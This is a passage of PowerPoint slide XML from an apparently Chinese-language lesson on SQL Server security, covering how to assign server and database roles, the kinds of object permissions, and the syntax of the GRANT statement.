              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>选项，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>服务器角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>列表中，通过选择列表中的复选框来授予这个用户不同的服务器角色，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>如果要执行数据库角色，可以打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>用户映射</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>选项卡，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库角色成员身份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>列表中，通过启用复选框来授予</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DataBaseAdmin2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>不同的数据库角色。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>确定之后返回。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2A9E8D-5021-435F-931D-79D53A0CC6E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7104112" y="764704"/>
            <a:ext cx="2742857" cy="3980952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3CD7437-A6D1-41BB-858E-A9BE37388886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6706286" y="982928"/>
            <a:ext cx="5485714" cy="4904762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A0F9634-E509-474D-A6E4-F8D986528126}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509460" y="1680216"/>
            <a:ext cx="4180952" cy="3723809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7228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角色指派到多个登录用户</a:t>
            </a:r>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700808"/>
            <a:ext cx="6278488" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>对象资源管理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>窗口中，依次展开服务器节点下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>安全性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】➤【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>服务器角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>节点。右击系统角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>，在弹出的快捷菜单中选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>菜单命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>打开服务器角色属性窗口，单击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>选择服务器登录名或角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>对话框，选择要添加的登录账户，可以单击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>选择登录名前的复选框，然后单击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>确定之后返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E84477-7CE4-436F-968A-DDCD2785D217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7464152" y="980728"/>
            <a:ext cx="2828571" cy="4361905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10863DD8-81BF-429A-9848-A73CA885AFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7077714" y="1042007"/>
            <a:ext cx="5114286" cy="4990476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47D0023-E524-40F0-AA6E-63A56CF3E83E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068191" y="1979359"/>
            <a:ext cx="5123809" cy="2771429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8112C536-58AC-4C2E-9DA5-EE6E14826791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7258591" y="2863123"/>
            <a:ext cx="4323809" cy="2342857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF91704A-E424-4307-8C6D-642C4DDD4BEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7464152" y="3142564"/>
            <a:ext cx="4104762" cy="2276190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A06B9881-6F6F-489B-8D0B-3FD38B32B43D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793647" y="1916832"/>
            <a:ext cx="3819048" cy="3704762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382929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700808"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>    根据是否是系统预定义，可以把权限划分为预定义权限和自定义权限；按照权限与特定对象的关系，可以把权限划分为针对所有对象的权限和针对特殊对象的权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>预定义权限和自定义权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>在安装完成之后可以拥有预定义权限，不必通过授予即可取得。固定服务器角色和固定数据库角色就属于预定义权限。自定义权限是指需要经过授权或者继承才可以得到的权限，大多数安全主体都需要经过授权才能获得指定对象的使用权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>所有对象和特殊对象的权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>所有对象权限可以针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>中所有的数据库对象，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>CONTROL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>权限可用于所有对象。特殊对象权限是指某些只能在指定对象上执行的权限，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>可用于表或者视图，但是不可用于存储过程；而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>EXEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>权限只能用于存储过程，而不能用于表或者视图。针对表和视图，数据库用户在操作这些对象之前必须拥有相应的操作权限，可以授予数据库用户的针对表和视图的权限有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>REFERENCES 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>种。</a:t>
            </a:r>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权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88355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700808"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>权限管理包括：授予权限、拒绝权限和撤销权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>授予权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>为了允许用户执行某些操作，需要授予相应的权限，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>GRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>语句进行授权活动</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>格式如下：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>GRANT { ALL [ PRIVILEGES] | permission [ ( column [,…n]) [,…n] [ON [ CLASS : : ] securable ] TO principal [,…n] [WITH GRANT OPTION [AS principal]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>示例如下：向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>角色授予对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>stu_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>表的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>USE test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
